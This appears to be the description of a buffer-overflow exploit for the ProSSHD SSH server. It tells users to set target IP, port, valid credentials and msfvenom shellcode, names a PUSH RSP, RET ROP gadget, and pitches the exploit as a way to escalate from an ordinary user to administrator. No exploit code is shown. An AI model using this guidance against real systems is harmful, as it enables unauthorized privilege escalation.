An exploit for the BoF vulnerability which was present in ProSSHD.
- You will need to change some variable's values (IP, Port, User, Password, and Shellcode), and most likely the memory address for the ROP gadget.
- Shellcode can be generated with Msvenom, or just write your own if you're bored and have a lot of time on your hands.
- IP and Port would need to be changed to the IP of the host running ProSSHD and the respective port.
- User and Password would need to be the credentials for a valid user on the SSH service.
- The Memory address will depend on which gadget you want to use, but
PUSH RSP, RETworked for me. Ropper or any other gadget retrieval tool would be ideal.
Now, when you think about what's going on here, you might wonder "isn’t it kinda dumb?" Because you literally have to be authenticated or have valid credentials to the target machine for this to work. So, if you already have access, why would you want to gain access?
The answer is two-fold.
I enjoy this. Writing software is great, but making exploits? I live for this stuff. So this was great practice. An administrative user would have had to initiate the ProSSH daemon. If you have creds for some ordinary John Doe, this right here would be your ticket to the big leagues.